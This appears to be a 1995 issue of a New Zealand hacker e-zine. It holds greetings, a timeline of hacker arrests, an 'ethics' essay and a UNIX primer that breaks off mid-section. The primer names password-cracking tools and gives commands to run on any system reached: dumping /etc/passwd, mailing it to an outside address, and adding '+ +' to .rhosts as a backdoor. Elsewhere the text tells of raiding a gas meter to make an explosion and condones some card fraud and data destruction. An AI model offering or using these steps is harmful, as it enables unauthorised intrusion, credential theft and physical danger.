2758 lines
106 KiB
Plaintext
2758 lines
106 KiB
Plaintext
[ 01/04/95 SLi]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Welcome ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
|
|
|
|
Well, amazing! SLi IV. Let's see if we can keep this up.
|
|
If you want a letter to the editor or something like that
|
|
in here, send it (or any comments, etc.. ) to:
|
|
|
|
|
|
SLi
|
|
PO Box 3030
|
|
Onekawa
|
|
Napier
|
|
New Zealand
|
|
|
|
OR
|
|
|
|
Internet E-mail Address:
|
|
HACKER_M@IX.WCC.GOVT.NZ
|
|
|
|
OR
|
|
|
|
Call SLi BBS if you can find where it is
|
|
|
|
|
|
Please read SLi I, II & III if you have trouble with
|
|
any terms in this mag.
|
|
|
|
SLi mag written by New Zealanders for New Zealanders!
|
|
|
|
Oh, before I forget, we have a NEW editor (I'm still here tho').
|
|
CyntaxEra is now a Co-Editor and designer of the mag. It's
|
|
outlay and overall presentation is her domain, well unless I
|
|
get bossy.
|
|
|
|
|
|
|
|
.
|
|
[ 01/04/95 SLi]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
I N D E X
|
|
---------
|
|
|
|
|
|
|
|
|
|
Welcome ........................... Eon
|
|
The Rules ......................... Eon
|
|
Aunty Cyntax'Z Nutty noteZ ........ CyntaxEra
|
|
The Police ........................ Eon
|
|
Time Line ......................... Eon
|
|
Books 2 Read ...................... SLi
|
|
[In]Famous Quotes ................. Eon
|
|
Honour ............................ Eon
|
|
Unix .............................. Compiled by Eon
|
|
Busted 4 Nothing .................. Eon/Cyntaxera
|
|
The SLi Archive Subject list ...... Eon
|
|
Fake Mail ......................... Eon
|
|
Elements of Data Deprotection ..... Thorium
|
|
Review: 'ToT' ..................... CyntaxEra
|
|
SLi ............................... Eon
|
|
COCOT Phreaking in NZ ............. CyntaxEra
|
|
SmYte List ........................ SLi
|
|
Editors Knotez .................... Eon
|
|
|
|
|
|
.
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ The Rules ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
|
|
Okay, here are the rules for the SLi mag.
|
|
|
|
|
|
The entire mag is (C)opyright 1995 SLi
|
|
|
|
|
|
(1)
|
|
|
|
If you are working for a business that has some interest in the information
|
|
contained in this mag, you must send WRITTEN notification that you are in
|
|
possession of this [or any of the other SLi mags] to the following address:
|
|
|
|
|
|
SLi-Comp
|
|
PO Box 3030
|
|
Onekawa
|
|
Napier
|
|
New Zealand
|
|
|
|
|
|
Enclose your name, your company's name, address, and phone/fax number.
|
|
|
|
If you send an IBM formatted 720 disk and a SASE, we will send you the next
|
|
SLi mag. A donation of $5 is asked for however - as YOU can aford it (unlike
|
|
SOME of our readers).
|
|
|
|
|
|
(2)
|
|
|
|
This mag may not be edited, and no SINGULAR part may be quoted in any way!
|
|
However, the ENTIRE mag may be reproduced, but a charge of $1000 NZ will be
|
|
expected to be paid to the following address BEFORE any such reproduction.
|
|
|
|
|
|
SLi-Payment
|
|
PO Box 3030
|
|
Onekawa
|
|
Napier
|
|
New Zealand
|
|
|
|
Enclose your name, your company's name, address, and phone/fax number.
|
|
|
|
The fee must be paid in $CASH$. I, the editor, reserve the right
|
|
to revoke your rights to reproduce this mag at ANY time.
|
|
|
|
You may, if you are NOT a company, business or in anyway connected to law
|
|
enforcement or Telecom Security/Risk Management, produce ONLY TWO hard-copies
|
|
for no charge.
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Aunty Cyntax'Z Nutty noteZ ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
'lo out there yet again.. I can't believe it.. already issue #4.. Quite amazed
|
|
we've managed to get out another issue before anything drastic had happened
|
|
to restrict our printing, but even so, tough.
|
|
|
|
Well, anyhowz, I guess I'll do some greetz (considering I didn't do any in the
|
|
last issue..)..
|
|
|
|
Greetz go out to: [in absolutely NO order at all..]
|
|
|
|
SCoJaCK, Shatter, LexicnDvl, BooYaa [Sorry 'bout not contributing anyfink to
|
|
WPoS yet, but I've been a bit busy wif SLi stuff.. will get 'round to it if you
|
|
still want summink.. ;)], Tele [how's the bf/husband? ;)], max-q, ChezeHead,
|
|
motley, t00ph [sL0ppY or whatever you're callin' y'self now], Hellfire, D-FENS,
|
|
DTangent, GreYLocK, eck, Baccahbar, Wacko, PurpCon, noise, SSerpent, Serpent,
|
|
UtahSaint, phigan, JuLieT, Mindscrew, Solctice, Speed_Rcr, Hypnosis, wr, SsX,
|
|
UnderDeaD, HomeySan, hotrod, pyr0tech, Gen-X, Harl, kluge, Radikahl, Velcro,
|
|
qwiksilver, Datarape, TimeLord, Cellphone, neophyte, Snidely, 7up, Zibby -
|
|
(where the hell are you?), Thorium, XANTh, WiRED, Nitro-187, xn4rk, zaph0d,
|
|
Lestat, Visionary [Pat], DrMenace, GAnarchy, Freiheit, Opp, erikt.
|
|
|
|
[..and the rest of you hack/phreak guys/gals! Couldn't list y'all.. sorry
|
|
- maybe all that p0t actually HAS gone to my head.. ugh. ;)]
|
|
|
|
Sooo, any gossip this time 'round? Not really. *yawn* Very quiet lately which
|
|
means that there isn't much to talk about.. oh yeah...
|
|
|
|
CyntaxEra + R-A-D = eX-poTheaDz... *sigh* well... for a while anywayz.. =)
|
|
|
|
Doesn't that show how little there is to say this time round?! Uh, I guess
|
|
I could beg and plead for pieces of gossip to head our way (yup, even BBS ads
|
|
will be accepted.. I guess.. hmm.. maybe we'll add a special column for 'em..
|
|
Well, if there's enuf submitted, that is..)..
|
|
|
|
Hopefully, you guyz at ToT didn't get offended by my review - I tried to be as
|
|
HONEST as I could be without being TOO cutting (I got told I was a little harsh
|
|
with the comments, but I felt that they were appropriate - it's only an opinion
|
|
so don't take it personally.. =) ). Well, to you other readerz out there who
|
|
aren't in ToT, give it a read - you may find it amusing.. =)
|
|
|
|
Oh, it's a pity that I've been informed that ToT#2 was going to be the last
|
|
issue - it had promise [*flashbacks to SLi Issue #1 and remembers that we
|
|
hadn't really started out TOO magnificently* Mind you... it was a start].
|
|
|
|
Telco seems to be backing down for a bit, but that doesn't mean that they've
|
|
stopped 'investigating' 'n' stuff, but at least they're giving us a break! =)
|
|
|
|
[Ed's Note: Actually Cyntax, Heather is too busy to work on that, so she
|
|
says. She's a nice woman - just a bit slY <excuse the pun>
|
|
WELL [NEW INFO JUST ADDED] Maybe she's nice but the BOSS dude
|
|
ISNT. He's a LAMER! Cutting off poor Cyntax's 3-way GRRRR]
|
|
|
|
Special note to "THE FLY" - You've pissed me off once too often, and after
|
|
hearing of your comments, you'll get what's coming for you. Oh, and I'm sure
|
|
you enjoyed the "$2,000 phone call" from AT&T - so I was informed. They were
|
|
doing a bit of a crackdown on fone-phreaks and your name popped up somehow.
|
|
Pity they're too far away to seriously do something about it - don't think
|
|
they could be bothered, huh?
|
|
|
|
|
|
That's about it from me.. for now
|
|
|
|
'Till next issue (well, next article anyway.. ;) )... over and OUT.
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ The Police ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
-The Police-
|
|
|
|
|
|
Ahh, now, this is a laugh and it was VERY boring, but here goes anyway...
|
|
|
|
|
|
We ALL know police, dont we? Now, I thought that police were there to pro-
|
|
tect, BUT....
|
|
|
|
It all happened one EARLY morning - about 5am. We were, uh, well, breaking
|
|
into a gas-meter to get some gas to fill a rubbish bag with to make a bit of
|
|
a large explosion somewhere in the metropoliton area. Now, sadly :( me and
|
|
another individual were smacking the shit outta this gas meter's pipes and
|
|
we hear a car driving towards where we were. We [by the way, we were in a
|
|
car - not at that moment, obviously] dropped the crowbar [thats what we were
|
|
talking to the gas-meter with] and hid behind the car.
|
|
|
|
Unfortunatly, the police had seen us, so I [holdin' a spanner] tried to look
|
|
like we were undoing the wheel [There was a stone in it. Well, that was the
|
|
story anyway]. Now, the cops asked us questions, searched our car for drugs
|
|
and basicly harrassed us until EXACTLY 6:30am [it mighta been 5:30am].
|
|
Anyway, I was informed that that is the EXACT time the police go home, so all
|
|
we were was a 'time-waster'.
|
|
|
|
I must admit that I have lost some respect I had for the boys/'girl-boys' in
|
|
blue. The car-driver's mom got called and he got in shit. We had to walk
|
|
back and pick up the crowbar we had left 'hidden in plain sight' - they some-
|
|
how managed to miss it - and basically, we had a really bad day [morning]...
|
|
|
|
BTW - Cops ask really STUPID questions!
|
|
|
|
|
|
Cop: Why is there broken glass near that car??
|
|
|
|
Me: I dunno, but if you were a _real_ detective, you would notice
|
|
that the broken glass is nowhere near the broken window.
|
|
Obviously the car has been moved since the glass was broken so
|
|
we CAN'T have done it.
|
|
|
|
|
|
Cop: You ever had a run in with us before?
|
|
|
|
Me: [thinking]
|
|
What a fucking stupid question to ask! I told you my name so
|
|
why don't you just look it up?
|
|
[saying]
|
|
Just the usual - being out late and getting stopped. Nothing
|
|
really.
|
|
|
|
|
|
Cop from
|
|
Vice squad: Been smoking any dak? [dak = pot/green plant/cannibis ]
|
|
|
|
A friend: I wish.
|
|
|
|
|
|
|
|
Well, I have no problems with police, except that _SOME_ policewomen have a
|
|
really bad attitude and that some policemen thing that they are god's gift
|
|
to the world. But, the police do a job that MUST be done. I salute them
|
|
for it... BUT, Mr/Ms Police Officer, take my advice and do what is right-
|
|
eous and just not necessarally what is legal.
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ TIME LINE ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
Well, here we have it. A timeline of events in the H/P world.
|
|
Now, I might have screwed up a few things so please no mail bombs
|
|
and bear with me.
|
|
|
|
|
|
Information and Dates have been taken from:
|
|
|
|
|
|
"The Hacker Crackdown" ---- Bruce Sterling
|
|
|
|
"THEFT OF COMPUTER SOFTWARE ____ William J. Cook,
|
|
A NATIONAL SECURITY THREAT" Assistant U.S. Attorney
|
|
|
|
PGP DOX ---- Author Unknown at time of
|
|
Publication.
|
|
"The History of LOD/H ____
|
|
Revision #3 May 1990" Lex Luthor
|
|
|
|
U.S. Newswire ---- Author Unknown at time of
|
|
Articles Publication.
|
|
|
|
News Artical ____ Barbara E. McMullen and
|
|
Pump-Con Bust John F. McMullen
|
|
-03/11/1992-
|
|
|
|
|
|
and finally, my own knowlege.
|
|
|
|
|
|
|
|
KEY:
|
|
|
|
Okay, the only major thing I should explain is, the use of
|
|
"Sometime." and "Sometime?". A question mark means I'm not sure
|
|
WHEN it happened in that year. A "." means I'm not sure of which
|
|
month things happened, but it was in this order.
|
|
|
|
|
|
|
|
-=[ Our History ]=-
|
|
|
|
|
|
|
|
1865:
|
|
U.S. Secret Service (USSS) founded.
|
|
|
|
1876:
|
|
Alexander Graham Bell invents telephone.
|
|
|
|
1878:
|
|
First teenage males flung off phone system by enraged
|
|
authorities.
|
|
|
|
1939:
|
|
"Futurian" science-fiction group raided by Secret
|
|
Service.
|
|
|
|
1971:
|
|
Yippie phone phreaks start YIPL/TAP magazine.
|
|
|
|
1972:
|
|
*Ramparts* magazine seized in blue-box rip-off
|
|
scandal.
|
|
|
|
1978:
|
|
Ward Christenson and Randy Suess create first
|
|
personal computer bulletin board system.
|
|
|
|
1982:
|
|
William Gibson coins term "cyberspace."
|
|
|
|
1982:
|
|
"414 Gang" raided.
|
|
|
|
1983-1984:
|
|
AT&T dismantled in divestiture.
|
|
|
|
1984:
|
|
Congress passes Comprehensive Crime Control Act
|
|
giving USSS jurisdiction over credit card fraud and
|
|
computer fraud.
|
|
|
|
1984:
|
|
the U.S. Department of Commerce placed expanded export
|
|
controls on computer software as part of its general
|
|
protection of technical data deemed vital to the
|
|
national defense and security of the United States.
|
|
|
|
1984:
|
|
"Legion of Doom" formed.
|
|
|
|
January. "PLOVERNET" went online. [A H/P BBS]
|
|
|
|
Sometime? "LOD BBS" goes online.
|
|
|
|
Sometime? Groups such as "Fargo 4A" and "Knights of Shadow"
|
|
form.
|
|
|
|
Sometime May?. "KOS" breaks up.
|
|
|
|
1984:
|
|
*2600: The Hacker Quarterly* founded.
|
|
|
|
1984:
|
|
*Whole Earth Software Catalog* published.
|
|
|
|
1985:
|
|
First police "sting" bulletin board systems
|
|
established.
|
|
|
|
1985:
|
|
Whole Earth eLectronic Link computer conference (WELL)
|
|
goes on-line.
|
|
|
|
1986:
|
|
Computer Fraud and Abuse Act passed in USA.
|
|
|
|
1986:
|
|
Electronic Communications Privacy Act passed in US.
|
|
|
|
1987:
|
|
Chicago prosecutors form Computer Fraud and Abuse
|
|
Task Force.
|
|
|
|
July/September. A Chicago youth attacked AT&T computers at Bell Labs
|
|
in Illinois and New Jersey, at a NATO missile support
|
|
site in North Carolina, and at Robbins Air Force Base.
|
|
|
|
1988:
|
|
|
|
July. Secret Service covertly videotapes "SummerCon" hacker
|
|
convention.
|
|
|
|
September. "Prophet" cracks BellSouth AIMSX computer network and
|
|
downloads E911 Document to his own computer and to
|
|
Jolnet.
|
|
|
|
September. AT&T Corporate Information Security informed of
|
|
Prophet's action.
|
|
|
|
October. Bellcore Security informed of Prophet's action.
|
|
|
|
October. Scotland Yard arrested an English attacker who had
|
|
broken into over 200 military, corporate, and
|
|
university computers in the United States and Europe.
|
|
|
|
November 2. A college undergraduate planted a computer virus that
|
|
temporarily disabled 6,000 computers on the Internet
|
|
[* The Internet Worm *]
|
|
|
|
December. A search warrant filed by U.S. Customs agents in
|
|
Chicago disclosed that a confederate of the Yugoslav
|
|
Consul-General in Chicago was using a hacker to attack
|
|
defense contractors by remote access in order to steal
|
|
computerized information. According to the affidavit,
|
|
the information obtained by the hacker was
|
|
subsequently smuggled out of the United States in
|
|
diplomatic pouches with the help of the Counsel-
|
|
General.
|
|
|
|
1989:
|
|
|
|
January. Prophet uploads E911 Document to Knight Lightning.
|
|
|
|
February 25. Knight Lightning publishes E911 Document in *Phrack*
|
|
electronic newsletter.
|
|
|
|
March. It was disclosed that West German hackers sponsored
|
|
by Eastern Bloc intelligence agencies had been
|
|
systematically searching for classified information
|
|
on Government computers throughout the United States
|
|
through a weakness in a computer network at a
|
|
California university.
|
|
[* Pengo and Operation Equilizer *]
|
|
|
|
March. A member of the Soviet military mission in Washington,
|
|
DC, was arrested and expelled from the United States
|
|
for attempting to obtain technical information about
|
|
how U.S. Government classified information is secured
|
|
in computers.
|
|
|
|
April. Canada expelled 19 Soviet diplomats for wide-ranging
|
|
espionage operations to obtain Canadian defense
|
|
contractor information for military and commercial
|
|
purposes.
|
|
|
|
May. Chicago Task Force raids and arrests "Kyrie."
|
|
|
|
June. "NuPrometheus League" distributes Apple Computer
|
|
proprietary software.
|
|
|
|
June 13. Florida probation office crossed with phone-sex line in
|
|
switching-station stunt.
|
|
|
|
July. "Fry Guy" raided by USSS and Chicago Computer Fraud
|
|
and Abuse Task Force. July. Secret Service raids
|
|
"Prophet," "Leftist," and "Urvile" in Georgia.
|
|
|
|
1990:
|
|
|
|
Sometime? PGP (Pretty Good(tm) Privacy) created by
|
|
Philip Zimmermann.
|
|
|
|
January 15. Martin Luther King Day Crash strikes AT&T
|
|
long-distance network nationwide.
|
|
|
|
January 18-19. Chicago Task Force raids Knight Lightning in
|
|
St. Louis.
|
|
|
|
January 24. USSS and New York State Police raid "Phiber Optik,"
|
|
"Acid Phreak," and "Scorpion" in New York City.
|
|
|
|
February 1. USSS raids "Terminus" in Maryland.
|
|
|
|
February 3. Chicago Task Force raids Richard Andrews' home.
|
|
|
|
February 6. Chicago Task Force raids Richard Andrews' business.
|
|
|
|
February 6. USSS arrests Terminus, Prophet, Leftist, and Urvile.
|
|
|
|
February 9. Chicago Task Force arrests Knight Lightning.
|
|
|
|
February 20. AT&T Security shuts down public-access "attctc"
|
|
computer in Dallas.
|
|
|
|
February 21. Chicago Task Force raids Robert Izenberg in Austin.
|
|
|
|
March 1. Chicago Task Force raids Steve Jackson Games, Inc.,
|
|
"Mentor," and "Erik Bloodaxe" in Austin.
|
|
|
|
May 7,8,9. USSS and Arizona Organized Crime and Racketeering
|
|
Bureau conduct "Operation Sundevil" raids in
|
|
Cincinnatti, Detroit, Los Angeles, Miami, Newark,
|
|
Phoenix, Pittsburgh, Richmond, Tucson, San Diego,
|
|
San Jose, and San Francisco.
|
|
|
|
May. FBI interviews John Perry Barlow re NuPrometheus case.
|
|
|
|
June/July. Mitch Kapor and Barlow found Electronic Frontier
|
|
Foundation; Barlow publishes *Crime and Puzzlement*
|
|
manifesto. [*The official EFF "about.eff" says
|
|
EFF founded in July*]
|
|
|
|
July 10. Members in LOD pleed guilty
|
|
|
|
July 24-27. Trial of Knight Lightning.
|
|
|
|
1991:
|
|
|
|
Sometime? US Senate Bill 266, a omnibus anti-crime bill,
|
|
had an unsettling measure buried in it.
|
|
If this non-binding resolution had become real
|
|
law, it would have forced manufacturers of secure
|
|
communications equipment to insert special "trap
|
|
doors" in their products, so that the US Government
|
|
can read anyone's encrypted messages.
|
|
This measure was defeated after rigorous protest from
|
|
civil libertarians and industry groups.
|
|
|
|
March 25-28. Computers, Freedom and Privacy conference in San
|
|
Francisco.
|
|
|
|
May 1. Electronic Frontier Foundation, Steve Jackson, and
|
|
others file suit against members of Chicago Task
|
|
Force.
|
|
|
|
July 1-2. Switching station phone software crash affects
|
|
Washington, Los Angeles, Pittsburgh, San Francisco.
|
|
|
|
July 8. MOD indictment's filed aganced MOD members Julio
|
|
Fernandez, aka. "Outlaw," John Lee, aka. "Corrupt,"
|
|
Mark Abene, aka. "Phiber Optik," Elias Ladopoulos,
|
|
aka. "Acid Phreak," and Paul Stira, aka. "Scorpion,"
|
|
|
|
February. CPSR Roundtable in Washington, D.C.
|
|
|
|
September 17. AT&T phone crash affects New York City and three
|
|
airports.
|
|
|
|
1992:
|
|
Sometime? FBI Digital Telephony wiretap proposal was introduced
|
|
to Congress. It would require all manufacturers of
|
|
communications equipment to build in special remote
|
|
wiretap ports that would enable the FBI to remotely
|
|
wiretap all forms of electronic communication from FBI
|
|
offices.
|
|
|
|
March 11. New York Police Department has announced the arrest of
|
|
Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron
|
|
J. Woodard, 18 for the alleged crimes of Unauthorized
|
|
Use Of A computer and Attempted Computer Trespass,
|
|
both misdemeanors. Also arrested was Jason A. Brittain
|
|
22 in satisfaction of a State of Arizona Fugitive From
|
|
Justice warrant. The arrests took place in the midst
|
|
of "PumpCon".
|
|
|
|
1993:
|
|
Sometime. SLi BBS goes up in NZ.
|
|
|
|
March 21. SLi gets national TV coverage from TVNZ.
|
|
|
|
April 16th. US Government-built encryption device, called the
|
|
"Clipper" chip, containing a new classified NSA
|
|
encryption algorithm. The Government is encouraging
|
|
private industry to design it into all their secure
|
|
communication products. The catch: At the time of
|
|
manufacture, each Clipper chip will be loaded
|
|
with its own unique key, and the Government gets to
|
|
keep a copy.
|
|
|
|
June. DC busts - A 2600 meeting is broken up by mall cops
|
|
and police.
|
|
|
|
1994:
|
|
March. TNO [The New Order] gets busted; Flatline BBS is
|
|
raided.
|
|
|
|
Sometime. Unlucky person nailed in Auckland, NZ, for around
|
|
$250,000 of fone fraud concerning NZ Telecom
|
|
($200,000) and AT&T ($40,000).
|
|
|
|
Sometime. Phreak in Wellington busted for beige boxing by
|
|
Clear Communications, NZ.
|
|
|
|
Sometime. Big Calling Card investigation in NZ - "Motley" in
|
|
Sweeden is busted in conjunction with CC'z - no major
|
|
charges are laid.
|
|
|
|
June 10. "Deathstar" gets busted - no charges laid.
|
|
|
|
August 6. "Tooph" makes front page news with his alliance conf
|
|
calls - One was a call to NZ for 293 mins costing
|
|
$306.
|
|
|
|
Sometime. "MrPurple" busted for US$40,000 worth of conference
|
|
charges. [* At time of publication, in jail =( *]
|
|
|
|
Late/Early95. NZ Telecom hassles Wellington phreaks about VMB
|
|
hacking. [how lame!].
|
|
|
|
1995:
|
|
January. Wellington H/P'ers hunted down by Victoria University
|
|
(with a little help from local cops) 'cos someone got
|
|
'OPERATOR' on their boxes.
|
|
[Yeah, wasn't 'root' but it scared 'em enuf!]
|
|
|
|
Febuary 17. Hacker Busted in USA for 20.000 credit cards
|
|
Kevin Mitnick aka Condor
|
|
|
|
March 22. S.A.M.S.O.N meeting in Wellington, New Zealand
|
|
"1. To identify interested parties in joining our
|
|
proposed organisation - namely SAMSON - Software
|
|
and Modem System Operators Network!
|
|
2. To establish and agree on a formal code of ethical
|
|
practices for the successful running of a public
|
|
BBS." [* well they will wanna shut me down, wont
|
|
they! :P *]
|
|
|
|
|
|
-eof-
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ [In]Famous Quotes ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
----Eon,---Grasshopper-+-others---in--a---car----
|
|
Eon: "Let's go crash some place."
|
|
Grasshopper: "I hope you meant as in sleeping."
|
|
|
|
|
|
Grasshopper: "He's `Joe-average'"
|
|
Eon: "He's `Joe-BELOW average'"
|
|
|
|
|
|
George: "I'll lock you out of my Bulletin Board and give you twit
|
|
access forever! Ahh ahahahaha!" [spoken in a voice like he
|
|
had an award winning carrot up his ass]
|
|
|
|
|
|
Cardinal: "Dial '111' and make a cop come."
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Honor ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
Honor.
|
|
|
|
For a hacker to justify his/her actions, he/she must have a guideline of rules
|
|
of morals - a sense of honour. Some do, some dont, but I hope to show you
|
|
what Hack/Phreak people's ethics should be, in my opinion.
|
|
|
|
|
|
1. For a start, injuring a single person;
|
|
|
|
CC abuse is wrong. It is not ethical. Our fight is not against the
|
|
little man or woman - our fight is against the profiteering companies
|
|
and hiracial[sp?] government departments. We do not steal from the
|
|
poor, and the helpless, and in a sense, that is what CC fraud is most
|
|
of the time. Sure, occasionally you get some rich guy with 40 grand
|
|
in his account, but those times are few and in between. Basically CC
|
|
fraud is out.
|
|
|
|
<Of course, if a company is "lame" enough to accept a checksum's cre-
|
|
dit card - it's up to you!>
|
|
|
|
Beige boxing is out also, unless you're phreaking from an embassy,
|
|
government department or Telecom [AT&T, Telco.. etc...] phone box.
|
|
|
|
2. You're not a anarchist [in the explosive terms]. It only gives us a bad
|
|
name.
|
|
|
|
3. Destroying data, except for covering your tracks, is out.
|
|
|
|
4. Your world is that of the computer and the phone. Our world is safe
|
|
from the problems of racial prejudice, sexual descrimination, descrim-
|
|
inate by what someone says - not what they look like, sound like, or
|
|
what there beliefs are.
|
|
|
|
5. Our word of honour is PERMANENT. If given, NEVER break it. If you do,
|
|
you are no more worthy of your position in society as a murderer or a
|
|
rapist.
|
|
|
|
6. Respect all others' points of view - even if it is foolish.
|
|
|
|
7. NEVER attack anything if it hasn't done anything to you.
|
|
[Hmm, does that include kicking poor, little, defenseless PUPPIES!?]
|
|
|
|
8. Don't talk behind others' backs. If you want to say something, say it to
|
|
their face. Only dishonourable people dont tell people what they think,
|
|
but tell others instead. <maybe I should take notice of this one!>
|
|
|
|
|
|
Remember, our war is the war that will shape the future. If we are not
|
|
ever diligent, we will lose our rights as an individual - we will become
|
|
nothing more than a number. Governments love numbers, as do all money
|
|
making companies. Protect the little free speech and the few rights we
|
|
have left. Protect them well, my brethren, for we will need it one day
|
|
more than we will need anything else.
|
|
|
|
Above all, our war is directed at big businesses and governments, not towards
|
|
random people in our streets.
|
|
|
|
|
|
|
|
Eon.
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ UNIX ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
UNIX is an OS used by "ALL SMART people" - I'm biest[sp?]. 80* processors
|
|
can use it, although 8088's will have to use a UNIX-like OS - not a UNIX OS
|
|
but 486's, 386's, Pentiums, and the like, can run it. SUN box's and VAX's
|
|
can run it. In fact, that's the amazing thing about Unix - it's PORTABLE!
|
|
|
|
Anyway, away from the dribble.
|
|
|
|
I guess I'll start at the top.
|
|
|
|
|
|
Basic UNIX username/password prompt:
|
|
|
|
login:
|
|
Password:
|
|
|
|
|
|
This CAN be changed. After all, with UNIX, you get the source to everything.
|
|
|
|
One good thing with UNIX is that the password file is globally readable unless
|
|
the system administrator has enabled a shadow password system - not standard
|
|
with unix. The passwords are in:
|
|
|
|
/etc/passwd
|
|
|
|
Mind you this can be changed also. After all, with UNIX, you get the source
|
|
to everything.
|
|
|
|
|
|
A UNIX passwd file looks like this:
|
|
|
|
root:FO0Cj1eXP1So.:0:20:The Superuser:/root:/bin/tcsh
|
|
jones:wS31XtSkN8H0.:1023:20:Eric Jones,cb234,,:/u/staff/jones:/bin/tcsh
|
|
peter:4gjxaKBycRUjE:1024:20:Peter Hall,,,:/u/staff/peter:/bin/tcsh
|
|
jmm:0PmsQGJvUVvfQ:1025:20:Joe Morris,,,:/u/staff/jmm:/usr/sbin/suspended
|
|
bmckenna:GIP1BJAf83Oi6:1029:20:Bill McKenna,,,:/u/others/bmckenna:/bin/tcsh
|
|
jonathan:3.A8QX3BfCdm6:1030:23:Jonathan Stone,,,:/u/others/jonathan:/bin/tcsh
|
|
mike:zMS3vvmSnn0bc:1033:20:Mike Doyle,CC404,8874,:/u/staff/mike:/bin/tcsh
|
|
paula:s4drmoa6xnJPI:1036:23:Paula Hine,,,:/u/others/paula:/bin/passwd
|
|
anthea:Slq/SPUf75UK2:1038:23:Anthea Grob,,,:/u/others/anthea:/bin/passwd
|
|
ladner:zUAhxM/sSqKbY:1045:20:Richard Ladner,cb207,,:/u/others/ladner:/bin/tcsh
|
|
user:PeqTb4v4Cc1Ak:1050:23:Temporary Guest Account,,,:/u/others/user:/bin/tcsh
|
|
andreae:uLUDo39sS3QmE:1052:23:Andreae Family:/u/others/andreae:/bin/tcsh
|
|
|
|
|
|
The layout may differ from UNIX's, but this is the standard layout:
|
|
|
|
Username:Password:UserID:GroupID:InfoOnUser:UsersHomeDir:User'sShell
|
|
|
|
|
|
You will notice that the second field is the password one. UNIX uses a one-
|
|
way password encryption system. When you login, and type your password, it
|
|
encrypts your input and compares the users password field to what you entered.
|
|
If it is the same, you've got the password right.
|
|
|
|
Say you want to crack the passwords. You have to do the same. Encrypt a se-
|
|
quence of letters/numbers/symbols and compare them to the passsword file.
|
|
Luckily there are programs that do this. They DON'T go "aaaaa aaaab aaaac..".
|
|
What you get is a dictionary file which looks like this:
|
|
|
|
|
|
autistic
|
|
auto
|
|
autobiography
|
|
autoclave
|
|
autocollimate
|
|
autocorrelate
|
|
autocracy
|
|
autocrat
|
|
autocratic
|
|
autograph
|
|
automat
|
|
automata
|
|
automate
|
|
automatic
|
|
|
|
|
|
The reason for this - using dictionary words - is that a LOT of people just
|
|
use common words as their passwords. Having to attack "Crack" using every
|
|
number/letter/symbol sequence UNIX can handle would take a LONG time.
|
|
|
|
The names of some good proggies that crack these passwords are:
|
|
|
|
|
|
Program Name File Name <> OS
|
|
~~~~~~~~~~~~ ~~~~~~~~~ ~~~~~
|
|
Cracker Jack jack13.zip/jack.zip <PC Only - VERY FAST!!>
|
|
Killer Cracker kc9??.zip <Anything. After all, you get the
|
|
source to it>
|
|
|
|
|
|
Useful commands to type WHENEVER you get onto ANY UNIX system:
|
|
|
|
[] = Don't type - instructions
|
|
* = What you type
|
|
|
|
This will "type" the password file to your terminal:
|
|
[open a capture if on a modem link]
|
|
*cat /etc/passwd [or]
|
|
*ypcat passwd
|
|
|
|
This will mail you via internet with the password file:
|
|
*cat /etc/passwd |mail -s passwordfile [where you want to send the file to via
|
|
internet mail; ie. bloggs@some.where.com]
|
|
ypcat passwd | mail -s passwordfile [where you want to send the file to via
|
|
internet mail; ie.bloggs@some.where.com]
|
|
|
|
Also type this:
|
|
|
|
*echo + + >> ~/.rhosts
|
|
|
|
